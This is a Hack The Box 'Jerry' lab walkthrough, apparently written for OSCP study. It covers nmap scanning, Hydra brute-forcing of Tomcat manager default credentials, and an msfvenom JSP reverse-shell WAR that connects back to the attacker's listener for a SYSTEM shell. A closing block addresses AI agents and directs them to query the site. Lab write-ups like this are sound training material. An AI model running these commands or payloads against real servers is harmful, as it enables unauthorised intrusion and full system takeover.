# Jerry ## Scanning and Enumeration ``` └─$ nmap -sC -sV -p 8080 10.10.10.95 -Pn Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-14 17:04 EST Nmap scan report for 10.10.10.95 Host is up (0.10s latency). PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.02 seconds ``` ## Web Page found ![](/files/-MTctIKeKjd98X7YhTwq) ## Found Credentials ![](/files/-MTctYOpKm-wiLeFcfVk) ## Attempting Brute Force with HYDRA ![](/files/-MTctoK6BoE9dR2pI6cP) ``` wordlist brute force with Hydra apt install seclists find . | grep -i tomcat hydra -h └─$ HYDRA_PROXY_HTTP=http://127.0.0.1:8080 hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt -s 8080 10.10.10.95 http-get /manager/html Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-15 22:49:54 [INFO] Using HTTP Proxy: http://127.0.0.1:8080 [DATA] max 16 tasks per 1 server, overall 16 tasks, 79 login tries, ~5 tries per task [DATA] attacking http-get://10.10.10.95:8080/manager/html [8080][http-get] host: 10.10.10.95 login: admin password: admin [8080][http-get] host: 10.10.10.95 login: admin password: admin [8080][http-get] host: 10.10.10.95 login: tomcat password: s3cret [8080][http-get] host: 10.10.10.95 login: tomcat password: s3cret 1 of 1 target successfully completed, 4 valid passwords found ``` As you can see, we were able to obtain 2 credentials, both of which were found. We forwarded our request to the burp proxy. Enumerating the webpage we find something speacial, an upload section. We can also tell that this is a windows machine. Take a look here. ![](/files/-MTcyPppUdp_JPrxqiIE) Lets try to upload a war file. Note, that a war file is like a zip file so we may have to find a jsp file, which are included in war files and make sure that that jsp file is a spooky file. ## Generating a shell and establishing connection ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=9001 -f war > shell.war set up listener nc -lvnp 9001 └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.31] from (UNKNOWN) [10.10.10.95] 49192 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system C:\apache-tomcat-7.0.88> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/jerry.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.